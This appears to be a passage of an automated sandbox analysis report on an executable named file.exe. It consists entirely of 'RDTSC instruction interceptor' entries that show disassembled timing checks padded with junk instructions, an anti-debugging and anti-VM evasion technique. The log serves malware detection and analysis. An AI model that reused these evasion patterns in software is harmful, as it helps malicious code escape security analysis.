                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 286B4B second address: 286B51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 286B51 second address: 286B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 286B57 second address: 286B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 286B5B second address: 286B88 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD7ED120766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007FD7ED12076Fh 0x00000010 pop ebx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jbe 00007FD7ED12077Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d jc 00007FD7ED120766h 0x00000023 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 286B88 second address: 286B8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2231C2 second address: 2231C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 284DBB second address: 284DBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2231C7 second address: 2231D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FD7ED120766h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 284DBF second address: 284DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2231D1 second address: 22320D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD7ED120777h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FD7ED120768h 0x00000015 jmp 00007FD7ED120773h 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 284DC5 second address: 284DDB instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD7ECCCADECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22320D second address: 223214 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 284DDB second address: 284DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2896F3 second address: 2896F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2896F9 second address: 2896FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2896FD second address: 28970A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2873BE second address: 2873DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD7ECCCADF7h 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28970A second address: 289717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 je 00007FD7ED120766h 0x0000000c popad 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2873DC second address: 2873F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FD7ECCCADECh 0x00000010 jnl 00007FD7ECCCADE6h 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 289717 second address: 28971C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28971C second address: 28972F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jp 00007FD7ECCCADF2h 0x0000000b jnl 00007FD7ECCCADE6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28B772 second address: 28B78F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD7ED120766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD7ED12076Dh 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28B78F second address: 28B7C6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FD7ECCCADFCh 0x0000000c jmp 00007FD7ECCCADF6h 0x00000011 jmp 00007FD7ECCCADF2h 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 291CC4 second address: 291CCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FD7ED120766h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 291FEB second address: 291FFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD7ECCCADEFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 291FFF second address: 29200F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD7ED120766h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 295CB8 second address: 295CE3 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD7ECCCADE8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007FD7ECCCADEAh 0x00000015 mov eax, dword ptr [eax] 0x00000017 jl 00007FD7ECCCADF4h 0x0000001d pushad 0x0000001e jl 00007FD7ECCCADE6h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29DBD2 second address: 29DBD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29DBD6 second address: 29DBF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FD7ECCCADE6h 0x0000000e jmp 00007FD7ECCCADF3h 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29DBF7 second address: 29DBFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29CFD5 second address: 29CFF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD7ECCCADF2h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29CFF3 second address: 29CFF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29D174 second address: 29D178 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29D178 second address: 29D17E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29D17E second address: 29D18E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FD7ECCCADE6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29D745 second address: 29D749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29D749 second address: 29D764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD7ECCCADF2h 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29D764 second address: 29D78E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD7ED12077Ah 0x00000008 pushad 0x00000009 jmp 00007FD7ED12076Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29D8DC second address: 29D8E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29D8E0 second address: 29D8E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29D8E6 second address: 29D90C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD7ECCCADEEh 0x00000008 ja 00007FD7ECCCADE6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FD7ECCCADEFh 0x0000001c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29D90C second address: 29D910 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4269 second address: 2A4278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edi 0x00000007 jnp 00007FD7ECCCADEEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22EDF9 second address: 22EE0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FD7ED12076Eh 0x0000000b jp 00007FD7ED120766h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22EE0C second address: 22EE12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A2DC3 second address: 2A2DC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A2DC7 second address: 2A2DE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADF4h 0x00000007 jp 00007FD7ECCCADE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A2F4C second address: 2A2F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7ED12076Ah 0x00000009 pop edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A2F5B second address: 2A2F63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A3389 second address: 2A338E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A3779 second address: 2A37AE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD7ECCCADE6h 0x00000008 jmp 00007FD7ECCCADF3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FD7ECCCADF8h 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A37AE second address: 2A37B5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A37B5 second address: 2A37FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnc 00007FD7ECCCADFDh 0x0000000b jmp 00007FD7ECCCADF5h 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 jnp 00007FD7ECCCADFFh 0x0000001b jmp 00007FD7ECCCADF9h 0x00000020 push eax 0x00000021 push edx 0x00000022 push edi 0x00000023 pop edi 0x00000024 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A3AF7 second address: 2A3B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A3B03 second address: 2A3B31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jnc 00007FD7ECCCADE6h 0x00000012 jmp 00007FD7ECCCADF2h 0x00000017 popad 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A295E second address: 2A2972 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7ED12076Eh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A2972 second address: 2A299D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADF2h 0x00000007 jmp 00007FD7ECCCADEFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A299D second address: 2A29BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jng 00007FD7ED12076Ch 0x0000000b pushad 0x0000000c jmp 00007FD7ED12076Bh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26922C second address: 269232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269232 second address: 25191F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jnc 00007FD7ED12076Ch 0x0000000f lea eax, dword ptr [ebp+1247DF11h] 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007FD7ED120768h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f adc dh, FFFFFFCFh 0x00000032 push eax 0x00000033 jmp 00007FD7ED12076Ah 0x00000038 mov dword ptr [esp], eax 0x0000003b pushad 0x0000003c mov esi, dword ptr [ebp+122D2E63h] 0x00000042 popad 0x00000043 call dword ptr [ebp+122D1D24h] 0x00000049 pushad 0x0000004a jmp 00007FD7ED12076Bh 0x0000004f pushad 0x00000050 jmp 00007FD7ED120778h 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269458 second address: 269472 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FD7ECCCADECh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269472 second address: 269477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269765 second address: 269780 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD7ECCCADE8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FD7ECCCADEAh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269920 second address: 269952 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD7ED120766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jnp 00007FD7ED120770h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD7ED12076Eh 0x0000001f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269952 second address: 269958 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269958 second address: 26995F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26995F second address: 26997E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD7ECCCADF3h 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26997E second address: 2699C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD7ED120770h 0x0000000c jmp 00007FD7ED12076Eh 0x00000011 popad 0x00000012 popad 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 jmp 00007FD7ED12076Ah 0x0000001c pop eax 0x0000001d mov dx, cx 0x00000020 push 3F47673Bh 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2699C2 second address: 2699C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2699C6 second address: 2699CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2699CA second address: 2699D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269DF6 second address: 269E00 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD7ED120766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269E00 second address: 269E43 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FD7ECCCADE8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 add dword ptr [ebp+122D39DCh], ebx 0x0000002b push 00000004h 0x0000002d and ecx, 7A4142F2h 0x00000033 nop 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push edi 0x00000039 pop edi 0x0000003a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269E43 second address: 269E4D instructions: 0x00000000 rdtsc 0x00000002 js 00007FD7ED120766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269E4D second address: 269E5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD7ECCCADECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269E5E second address: 269E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD7ED120774h 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269E7C second address: 269E82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26A193 second address: 26A199 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26A199 second address: 26A19D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26A19D second address: 26A1A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26A4D0 second address: 26A4D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26A4D5 second address: 26A509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD7ED120766h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FD7ED120771h 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push ecx 0x00000018 push ecx 0x00000019 jg 00007FD7ED120766h 0x0000001f pop ecx 0x00000020 pop ecx 0x00000021 mov eax, dword ptr [eax] 0x00000023 push edi 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A7CCF second address: 2A7CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD7ECCCADF5h 0x0000000b popad 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A7CEB second address: 2A7CF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A7CF1 second address: 2A7CF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269935 second address: 269952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD7ED12076Eh 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A7FD4 second address: 2A7FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007FD7ECCCADF5h 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A8141 second address: 2A8145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A8145 second address: 2A8151 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A8433 second address: 2A8438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A872F second address: 2A8733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
